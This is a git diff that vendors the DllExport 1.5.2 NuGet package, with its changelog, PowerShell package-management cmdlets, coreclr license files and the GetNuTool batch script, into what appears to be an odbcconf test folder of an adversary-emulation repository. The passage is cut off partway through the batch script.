+[v1.5.1] 2016.11.12
+
+ * FIXED: Error : Invalid Option: /CVRES= Issue #20
+ * NOTE: Our coreclr version was compiled with MSVC 14.0. Related Issue #21
+
+[v1.5] 2016.11.04
+
+ * FIXED: Fixed problem with white-space chars in path: `Cannot find path '' because it does not exist ...`
+ * FIXED: Fixed typo with fullseq (ddNS) - incorrect `0x30 0x30` ~0x007A7-0x007A8 /details in #14
+ * FIXED: Possible problem with NullReferenceException when removing package.
+ * FIXED: Fixed problem with old NS data when we try to install package for project A, then for project B
+ * NEW: Implemented 'Generate .exp + .lib via MS Library Manager' #9
+ GUI Configurator + MSBuild property: `DllExportGenExpLib`
+
+ * NEW: Added support of unmanaged-export for Executable Modules (.exe) #18
+ * NEW: Cecil variant for ddNS features /#14, #2
+ * NEW: Added our custom IL Assembler as option to fix incorrect 0x13 / 0x11 opcodes. #17
+ GUI Configurator + MSBuild property: `DllExportOurILAsm`
+ It should help for users of Fody projects, etc.
+ https://github.com/Fody/Fody/issues/271
+
+ IlAsm 4.5.1 https://github.com/3F/coreclr
+ based on 4.5.22220.0 / coreclr 1.0.4
+ changelog of our coreclr for this release: https://github.com/3F/coreclr/blob/master/changelog.txt
+
+ * CHANGED: Updated scripts of installing/removing package for more correct loading of our assemblies.
+
+[v1.4] 2016.10.05
+
+ * FIXED: Fixed bug - `An item with the same key has already been added`. Issue #10
+ * FIXED: Bug with Meta library: Incorrect default values. Issue #16
+ please note, the __cdecl is the default calling convention for our library
+ as and for C and C++ programs.
+
+ * FIXED?: Probably fixed bug - `Script errors on package install` Issue #6
+ * FIXED?: Probably fixed bug - `non-English system language - syntax error` Issue #7
+ * NEW: GUI Configurator with updated ddNS features.
+ * NEW: Implemented feature 'Export for platform': [ x86 / x64 / x86 + x64 ] Issue #9
+ * NEW: Implemented feature 'Base for ordinals'. Issue #11
+ There is also alternative to configure this number - MSBuild property: DllExportOrdinalsBase
+
+ * NEW: The one (1) now is used by default as Base for all ordinals.
+ `Mimic ordinal counter (start from 1 instead of 0)` Issue #8
+
+ * CHANGED: The ddNS features now as binary cmdlet `NSBin`. Use `nsbin.bat` if needed.
+ * CHANGED: `Set "Inherited = false" in AttributeUsage for DllExportAttribute`. Issue #15
+ * OTHER: other possible changes and fixes.
+
+[v1.3] 2016.08.21
+
+ * FIXED: bug 'Incorrect library' when DllExport installed for 2+ projects.
+ * CHANGED: DllExport now uses `Cdecl` calling convention by default.
+ * CHANGED: Mono.Cecil v0.9.6.4
+
+[v1.2] 2016.07.13
+
+ * CHANGED: dynamic definition of namespace for user scope. Issue #2
+
+[v1.1] 2016.06.29
+
+ * CHANGED: DllExport now is part of System.Runtime.InteropServices as and DllImport.
+ * CHANGED: Mono.Cecil v0.9.6.1
+ * NEW: 0x80070005 meaning... Issue #1
+ * NEW: +DllExport(CallingConvention convention) signature
+
+[v1.0] 2016.06.25
+
+ * Initial the open release, based on v1.2.7.38850
+
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/lib/net20/DllExport.dll b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/lib/net20/DllExport.dll
new file mode 100644
index 00000000..4c13ce7a
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/lib/net20/DllExport.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/lib/net20/DllExport.dll.ddNSi b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/lib/net20/DllExport.dll.ddNSi
new file mode 100644
index 00000000..57c695c5
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/lib/net20/DllExport.dll.ddNSi differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/lib/net20/DllExport.dll.raw b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/lib/net20/DllExport.dll.raw
new file mode 100644
index 00000000..9d673d4f
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/lib/net20/DllExport.dll.raw differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/DllExportCmdLets.psm1 b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/DllExportCmdLets.psm1
new file mode 100644
index 00000000..cf24d4e8
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/DllExportCmdLets.psm1
@@ -0,0 +1,141 @@
+function Remove-OldDllExportFolder {
+ param($project)
+ $defaultFiles = ('DllExportAttribute.cs',
+ 'Mono.Cecil.dll',
+ 'RGiesecke.DllExport.dll',
+ 'RGiesecke.DllExport.pdb',
+ 'RGiesecke.DllExport.MSBuild.dll',
+ 'RGiesecke.DllExport.MSBuild.pdb',
+ 'net.r_eg.DllExport.targets')
+
+ $projectFile = New-Object 'System.IO.FileInfo'($project.FullName)
+
+ $projectFile.Directory.GetDirectories("DllExport") | Select-Object -First 1 | % {
+ $dllExportDir = $_
+
+ if($dllExportDir.GetDirectories().Count -eq 0){
+ $unknownFiles = $dllExportDir.GetFiles() | Select -ExpandProperty Name | ? { -not $defaultFiles -contains $_ }
+
+ if(-not $unknownFiles){
+ Write-Host "Removing 'DllExport' from " $project.Name
+ $project.ProjectItems | ? { $_.Name -ieq 'DllExport' } | % {
+ $_.Remove()
+ }
+
+ Write-Host "Deleting " $dllExportDir.FullName " ..."
+ $dllExportDir.Delete($true)
+ }
+ }
+ }
+}
+
+function Remove-OldDllExportFolders {
+ Get-Project -all | % {
+ Remove-OldDllExportFolder $_
+ }
+}
+
+function Get-MBEGlobalProjectCollection {
+ $msBuildV4Name = 'Microsoft.Build, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a';
+ $msBuildV4 = [System.Reflection.Assembly]::LoadWithPartialName($msBuildV4Name)
+
+ if(!$msBuildV4) {
+ throw New-Object 'System.IO.FileNotFoundException'("Could not load $msBuildV4Name.")
+ }
+
+ $projectCollection = $msBuildV4.GetType('Microsoft.Build.Evaluation.ProjectCollection')
+
+ return $projectCollection::GlobalProjectCollection
+}
+
+function Get-DllExportMsBuildProjectsByFullName([String] $fullName) {
+ $gpc = Get-MBEGlobalProjectCollection
+
+ return $gpc.GetLoadedProjects($fullName)
+}
+
+function Get-TempPathToDllTools([String] $toolsPath) {
+
+ $tempRoot = (Join-Path $([System.IO.Path]::GetTempPath()) '50ACAD2A-5AB3-4E6A-BA66-07F55672E91F') -replace ' ', '` '
+ $tempFolder = $([System.Guid]::NewGuid());
+ $delprefix = '__del__';
+
+ # rename for checking of lock / loaded assemblies
+ Get-ChildItem -Recurse -Path $tempRoot | ?{ $_.PSIsContainer } | %{
+ Rename-Item -ErrorAction SilentlyContinue -Path $_.FullName -NewName "$delprefix$($_.Name)"
+ }
+
+ # now try to delete only this
+ Get-ChildItem -Recurse -Path $tempRoot | ?{ $_.PSIsContainer -and $_.Name.StartsWith($delprefix) } | %{
+ Remove-Item $_.FullName -Force -Recurse -ErrorAction SilentlyContinue
+ }
+
+ $tdll = (Join-Path $tempRoot $tempFolder);
+ if(!(Test-Path -path $tdll)) {
+ New-Item $tdll -Type Directory >$null
+ }
+ Copy-Item $toolsPath\*.dll -Destination $tdll >$null
+
+ return $tdll
+}
+
+function Get-TempPathToConfiguratorIfNotLoaded([String] $asmFile, [String] $toolsPath) {
+
+ $tdll = Get-TempPathToDllTools $toolsPath
+ $mdll = (Join-Path $tdll $asmFile)
+
+ if(!(Get-Module -Name $asmFile)) {
+ # Import-Module $mdll;
+ return $mdll
+ }
+ return $null
+}
+
+# solution from here: https://github.com/3F/vsSolutionBuildEvent/blob/master/vsSolutionBuildEvent/Actions/ActionCSharp.cs
+# we can use it from 'init.ps1' for loading only once, or from 'install.ps1' / 'uninstall.ps1' to use always latest assemblies
+function Load-Configurator([String] $toolsPath) {
+
+ Get-Module -All | ?{ $_.Name -like '*net.r_eg.DllExport.Configurator*' } | % { Remove-Module $_ }
+
+ $nsbin = [System.Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes("$toolsPath\NSBin.dll"));
+ $conf = [System.Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes("$toolsPath\net.r_eg.DllExport.Configurator.dll"));
+
+ return $conf;
+}
+
+function Get-AllDllExportMsBuildProjects {
+ (Get-Project -all | % {
+ Get-DllExportMsBuildProjectsByFullName $_.FullName
+ }) | ? {
+ return ($_.Xml.Imports | ? {
+ "net.r_eg.DllExport.targets" -ieq [System.IO.Path]::GetFileName($_.Project);
+ }).Length -gt 0;
+ }
+}
+
+function Set-NoDllExportsForAnyCpu([String] $projectName, [System.Nullable[bool]] $value) {
+ $projects = Get-AllDllExportMsBuildProjects;
+
+ [String] $asString = $value;
+
+ if($projectName) {
+ $projects = $projects | where { $_.Name -ieq $projectName };
+ }
+ $propertyName = 'NoDllExportsForAnyCpu';
+
+ $projects = $projects | where {
+ $_.GetPropertyValue($propertyName) -ine $asString
+ } | % {
+ $_.SetProperty($propertyName, $asString);
+ }
+}
+
+Export-ModuleMember Set-NoDllExportsForAnyCpu
+Export-ModuleMember Get-MBEGlobalProjectCollection
+Export-ModuleMember Get-TempPathToDllTools
+Export-ModuleMember Get-TempPathToConfiguratorIfNotLoaded
+Export-ModuleMember Load-Configurator
+Export-ModuleMember Remove-OldDllExportFolder
+Export-ModuleMember Remove-OldDllExportFolders
+Export-ModuleMember Get-DllExportMsBuildProjectsByFullName
+Export-ModuleMember Get-AllDllExportMsBuildProjects
\ No newline at end of file
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/Microsoft.Build.Framework.dll b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/Microsoft.Build.Framework.dll
new file mode 100644
index 00000000..6c6f19be
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/Microsoft.Build.Framework.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/Microsoft.Build.Utilities.v4.0.dll b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/Microsoft.Build.Utilities.v4.0.dll
new file mode 100644
index 00000000..f797a177
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/Microsoft.Build.Utilities.v4.0.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/Microsoft.Management.Infrastructure.dll b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/Microsoft.Management.Infrastructure.dll
new file mode 100644
index 00000000..786b7593
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/Microsoft.Management.Infrastructure.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/Mono.Cecil.dll b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/Mono.Cecil.dll
new file mode 100644
index 00000000..5a07cf6b
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/Mono.Cecil.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/NSBin.dll b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/NSBin.dll
new file mode 100644
index 00000000..4e9958d6
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/NSBin.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/NSBin.pdb b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/NSBin.pdb
new file mode 100644
index 00000000..09087e21
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/NSBin.pdb differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/RGiesecke.DllExport.MSBuild.dll b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/RGiesecke.DllExport.MSBuild.dll
new file mode 100644
index 00000000..231d6ef4
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/RGiesecke.DllExport.MSBuild.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/RGiesecke.DllExport.MSBuild.pdb b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/RGiesecke.DllExport.MSBuild.pdb
new file mode 100644
index 00000000..ac21f927
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/RGiesecke.DllExport.MSBuild.pdb differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/RGiesecke.DllExport.dll b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/RGiesecke.DllExport.dll
new file mode 100644
index 00000000..970e713e
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/RGiesecke.DllExport.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/RGiesecke.DllExport.pdb b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/RGiesecke.DllExport.pdb
new file mode 100644
index 00000000..b30ef138
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/RGiesecke.DllExport.pdb differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/System.Management.Automation.dll b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/System.Management.Automation.dll
new file mode 100644
index 00000000..41a5fe9a
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/System.Management.Automation.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/LICENSE.TXT b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/LICENSE.TXT
new file mode 100644
index 00000000..99ae10b2
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/LICENSE.TXT
@@ -0,0 +1,21 @@
+The MIT License (MIT)
+
+Copyright (c) .NET Foundation and Contributors
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.
\ No newline at end of file
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/PATENTS.TXT b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/PATENTS.TXT
new file mode 100644
index 00000000..4b61bfaa
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/PATENTS.TXT
@@ -0,0 +1,47 @@
+Microsoft Patent Promise for .NET Libraries and Runtime Components
+
+Microsoft Corporation and its affiliates ("Microsoft") promise not to assert
+any .NET Patents against you for making, using, selling, offering for sale,
+importing, or distributing Covered Code, as part of either a .NET Runtime or
+as part of any application designed to run on a .NET Runtime.
+
+If you file, maintain, or voluntarily participate in any claim in a lawsuit
+alleging direct or contributory patent infringement by any Covered Code, or
+inducement of patent infringement by any Covered Code, then your rights under
+this promise will automatically terminate.
+
+This promise is not an assurance that (i) any .NET Patents are valid or
+enforceable, or (ii) Covered Code does not infringe patents or other
+intellectual property rights of any third party. No rights except those
+expressly stated in this promise are granted, waived, or received by
+Microsoft, whether by implication, exhaustion, estoppel, or otherwise.
+This is a personal promise directly from Microsoft to you, and you agree as a
+condition of benefiting from it that no Microsoft rights are received from
+suppliers, distributors, or otherwise from any other person in connection with
+this promise.
+
+Definitions:
+
+"Covered Code" means those Microsoft .NET libraries and runtime components as
+made available by Microsoft at https://github.com/dotnet/coreclr,
+https://github.com/dotnet/corefx and https://github.com/dotnet/corert.
+
+".NET Patents" are those patent claims, both currently owned by Microsoft and
+acquired in the future, that are necessarily infringed by Covered Code. .NET
+Patents do not include any patent claims that are infringed by any Enabling
+Technology, that are infringed only as a consequence of modification of
+Covered Code, or that are infringed only by the combination of Covered Code
+with third party code.
+
+".NET Runtime" means any compliant implementation in software of (a) all of
+the required parts of the mandatory provisions of Standard ECMA-335 – Common
+Language Infrastructure (CLI); and (b) if implemented, any additional
+functionality in Microsoft's .NET Framework, as described in Microsoft's API
+documentation on its MSDN website. For example, .NET Runtimes include
+Microsoft's .NET Framework and those portions of the Mono Project compliant
+with (a) and (b).
+
+"Enabling Technology" means underlying or enabling technology that may be
+used, combined, or distributed in connection with Microsoft's .NET Framework
+or other .NET Runtimes, such as hardware, operating systems, and applications
+that run on .NET Framework or other .NET Runtimes.
\ No newline at end of file
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/README.md b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/README.md
new file mode 100644
index 00000000..a4fc92dc
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/README.md
@@ -0,0 +1,18 @@
+[.NET Core Runtime (CoreCLR)](https://github.com/3F/coreclr)
+===========================
+
+This repo contains the .NET Core runtime, called CoreCLR, and the base library, called mscorlib. It includes the garbage collector, JIT compiler, base .NET data types and many low-level classes.
+
+Build Status
+------------
+
+ | CI
+--------------------| ----------------
+Win.x86-x64.Release | [](https://ci.appveyor.com/project/3Fs/coreclr/branch/master)
+
+
+License
+-------
+
+.NET Core (including the coreclr repo) is licensed under the [MIT license](LICENSE.TXT).
+
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/_Version.txt b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/_Version.txt
new file mode 100644
index 00000000..c2198013
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/_Version.txt
@@ -0,0 +1,10 @@
+
+Architecture | Platform | Config | commit-sha1 | ILD/Asm | coreclr | Path
+-------------|----------|---------|------------------------------------------|---------------------------|---------|-------------
+x86 | Windows | Release | 05afa4f81fdf671429b54467c64d65cde6b5fadc | [ 4.5.1 ] -> *4.5.22220.0 | *v1.0.4 | \bin\Win.x86\
+x64 | Windows | Release | 05afa4f81fdf671429b54467c64d65cde6b5fadc | [ 4.5.1 ] -> *4.5.22220.0 | *v1.0.4 | \bin\Win.x64\
+
+`* - The base of version, i.e. it can be different from official release`
+
+https://github.com/3F/coreclr
+
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/changelog.txt b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/changelog.txt
new file mode 100644
index 00000000..113dd884
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/changelog.txt
@@ -0,0 +1,26 @@
+https://github.com/3F/coreclr
+- - - - - - - - - - - - - - - -
+
+# coreclr \ ILAsm
+
+[v4.5.1]
+
+ * FIXED: Fixed using of cvtres (.res -> obj COFF-format) in mscorpe.
+ Possible crash: https://github.com/3F/coreclr/issues/2
+ Related Issue: https://github.com/3F/DllExport/issues/17
+
+ * NEW: Implemented additional searching of the converters of resources:
+ Environment PATH, local directory, and other additional from user path.
+ Now it also can be wrapped like ` mytool.cmd -> cvtres.exe %* ` etc.
+
+ * NEW: Added new /CVRES (/CVR) key to ilasm.exe
+ `/CVRES= Set path to cvtres tool: /CVR=cvtres.exe /CVR=tool\cvtres.cmd /CVR=D:\tool\`
+
+ * NOTE: based on 4.5.22220.0 / coreclr 1.0.4
+ ^ ^ ^ ^
+ | | | |-- VER_FILEVERSIONREVISION
+ | | |------- VER_FILEVERSIONBUILD
+ | |---------- VER_FILEVERSIONMINOR
+ |------------ VER_MAJORVERSION
+
+
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/coreclr.dll b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/coreclr.dll
new file mode 100644
index 00000000..08a6d5e0
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/coreclr.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/ilasm.exe b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/ilasm.exe
new file mode 100644
index 00000000..0289b6e4
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/ilasm.exe differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/ildasm.exe b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/ildasm.exe
new file mode 100644
index 00000000..c61b6a26
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/ildasm.exe differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/ildasmrc.dll b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/ildasmrc.dll
new file mode 100644
index 00000000..7f42d52b
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/ildasmrc.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/mscordaccore.dll b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/mscordaccore.dll
new file mode 100644
index 00000000..2730505b
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/mscordaccore.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/mscordbi.dll b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/mscordbi.dll
new file mode 100644
index 00000000..b6de6f3b
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/mscordbi.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/gnt.bat b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/gnt.bat
new file mode 100644
index 00000000..82b358b7
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/gnt.bat
@@ -0,0 +1,59 @@
+@echo off
+:: GetNuTool - Executable version
+:: Copyright (c) 2015-2016 Denis Kuzmin [ entry.reg@gmail.com ]
+:: https://github.com/3F/GetNuTool
+
+set gntcore=gnt.core
+set tgnt="%temp%\%random%%random%%gntcore%"
+
+set args=%*
+set a=%args:~0,30%
+set a=%a:"=%
+
+if "%a:~0,7%"=="-unpack" goto unpack
+if "%a:~0,8%"=="-msbuild" goto ufound
+
+for %%v in (14.0, 12.0, 15.0, 4.0, 3.5, 2.0) do (
+ for /F "usebackq tokens=2* skip=2" %%a in (
+ `reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSBuild\ToolsVersions\%%v" /v MSBuildToolsPath 2^> nul`
+ ) do if exist %%b (
+ set msbuild="%%b\msbuild.exe"
+ goto found
+ )
+)
+echo MSBuild was not found, try: gnt -msbuild "fullpath" args 1>&2
+goto exit
+
+
+:ufound
+call :popa %1
+shift
+set msbuild=%1
+call :popa %1
+
+:found
+call :core
+%msbuild% %tgnt% /nologo /p:wpath="%~dp0/" /v:m %args%
+del /Q/F %tgnt%
+goto exit
+
+:popa
+call set args=%%args:%1^=%%
+exit /B 0
+
+:unpack
+set tgnt=%~dp0\%gntcore%
+echo Generate minified version in %tgnt% ...
+
+:core
+%tgnt%
+^